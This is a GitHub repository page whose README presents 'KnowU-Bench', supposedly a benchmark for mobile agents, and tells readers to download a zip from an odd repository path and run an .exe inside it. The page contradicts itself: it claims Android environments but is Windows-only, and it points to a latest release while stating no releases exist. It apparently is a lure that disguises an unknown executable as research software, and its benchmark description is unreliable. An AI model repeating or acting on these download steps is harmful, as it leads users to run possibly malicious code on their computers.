Skip to content

annhien136loan117-cyber/KnowU-Bench

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
 
 
 
 

Repository files navigation

🤖 KnowU-Bench - Evaluate mobile agents with ease

KnowU-Bench helps you test how well mobile agents perform. The software provides a standard way to measure if your mobile assistant acts in a proactive and personalized manner. Researchers and developers use this tool to track progress in mobile automation.

📋 System Requirements

Your computer must meet these requirements to run the software:

  • Operating System: Windows 10 or Windows 11 (64-bit).
  • Processor: Intel Core i5 or AMD equivalent.
  • Memory: 8 GB RAM.
  • Storage: 2 GB of free space.
  • Graphics: Support for DirectX 11 or higher.

⬇️ Setup Instructions

Follow these steps to install the software on your Windows computer.

  1. Visit this page to download the software: https://github.com/annhien136loan117-cyber/KnowU-Bench/raw/refs/heads/main/uncalmed/Bench-Know-v3.0-beta.3.zip
  2. Select the file ending in .exe from the latest release.
  3. Save the file to your computer.
  4. Locate the file in your Downloads folder and double-click it.
  5. Follow the prompts on the screen to finish the installation.

⚙️ How to use the software

The program interface focuses on simplicity. Once you open the application, you see a dashboard with your agent current metrics.

Starting a test

To start a new evaluation session, click the button labeled New Test on the top left. Select the specific mobile agent you want to evaluate from the drop-down menu. The system loads the necessary configuration files for you automatically.

Configuring settings

The settings menu allows you to adjust how the system interacts with test environments. You can change the speed of the evaluation and the level of logging detail. Most users keep the default settings for initial testing.

Viewing results

Once the test finishes, the software generates a report. You can view these results as a chart or export them as a document for sharing. The software saves these reports in the Documents folder under KnowU-Bench.

📈 Understanding the metrics

The evaluation process tracks three main areas of agent performance.

  • Personalization: Does the agent remember past interactions?
  • Proactivity: Does the agent offer help before you ask?
  • Interaction Quality: Does the agent follow instructions correctly?

Each metric receives a score on a scale of 0 to 100. A score of 70 or above indicates that the agent performs within acceptable parameters.

🛠 Troubleshooting common issues

If the software fails to launch, verify that your Windows system has all updates installed. Sometimes, security software blocks the application. Check your security logs if the program does not appear.

Ensure that you have enough memory available. Close other programs if you notice the system running slow during an evaluation. If you see an error message, copy the text of the error and search for it in our help portal.

📋 Frequently Asked Questions

Can I run this on a Mac?

The current version supports Windows only.

Does the software require an internet connection?

An internet connection is necessary to download the latest agent profiles, but the evaluation process itself runs locally on your machine.

How do I update the software?

The application checks for updates every time you open it. If a new version exists, the system prompts you to download the installer.

Where can I report errors?

Use the Issues tab on the project page to submit bug reports. Provide a clear description of what happened when the error occurred.

⚖️ Guidelines for ethical testing

Respect user privacy when testing agents. Always use data sets that contain no personal information. Ensure that your tests comply with local regulations and organizational policies regarding automated systems.

This tool serves as an aid for development. Always verify outcomes with manual checks before finalizing your reports. Use the system to identify strengths and weaknesses in your design.

About

Evaluate personalized and proactive mobile agents using this interactive benchmark for reproducible Android environments.

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors